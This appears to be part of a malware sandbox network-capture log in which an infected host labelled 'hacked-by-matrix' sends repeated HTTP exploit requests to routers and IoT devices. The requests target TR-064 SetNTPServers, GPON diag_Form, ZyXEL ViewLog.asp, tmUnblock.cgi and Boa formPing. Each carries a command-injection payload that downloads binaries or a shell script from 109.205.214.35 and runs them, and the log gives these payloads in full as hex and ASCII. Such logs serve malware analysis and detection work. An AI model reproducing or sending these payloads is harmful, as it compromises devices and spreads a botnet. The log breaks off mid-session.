                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        380192.168.2.134247099.245.214.2027547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:15.177789927 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        381192.168.2.1350788178.162.174.1191723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:15.343720913 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        382192.168.2.134822414.85.156.287547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:15.386599064 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        383192.168.2.1351068178.239.114.24880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:15.993367910 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:17.070282936 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:17.268934011 CET321INHTTP/1.1 405 Not Allowed
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:22:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        384192.168.2.1342058172.67.116.38080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:16.711750031 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:16.993439913 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        385192.168.2.1341810172.65.226.728080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:16.711956024 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:16.993439913 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        386192.168.2.1341620104.172.71.617547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.275048971 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:18.221347094 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        387192.168.2.135670046.159.48.1957547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.345400095 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:17.591486931 CET125INHTTP/1.0 501 Not Implemented
                                                        Content-type: text/html
                                                        Date: Sat, 03 Jan 1970 16:44:50 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        388192.168.2.133504842.217.129.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.511456966 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        389192.168.2.1340376118.173.145.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.511527061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        390192.168.2.1357724109.112.190.93443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.511528015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        391192.168.2.1349722118.39.230.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.511528015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        392192.168.2.13423745.53.242.211443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.511569023 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        393192.168.2.1348708172.65.46.6055555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.928700924 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        394192.168.2.1348744172.65.17.655555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.928710938 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        395192.168.2.1355218172.65.230.4455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.928731918 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        396192.168.2.134283098.96.231.828080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:17.994488001 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        397192.168.2.1341696104.172.71.617547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:18.462419987 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:19.404247046 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        398192.168.2.1356444109.104.243.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516433954 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        399192.168.2.1348580109.236.130.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516457081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        400192.168.2.1339026118.214.189.79443
                                                        TimestampBytes transferredDirectionData
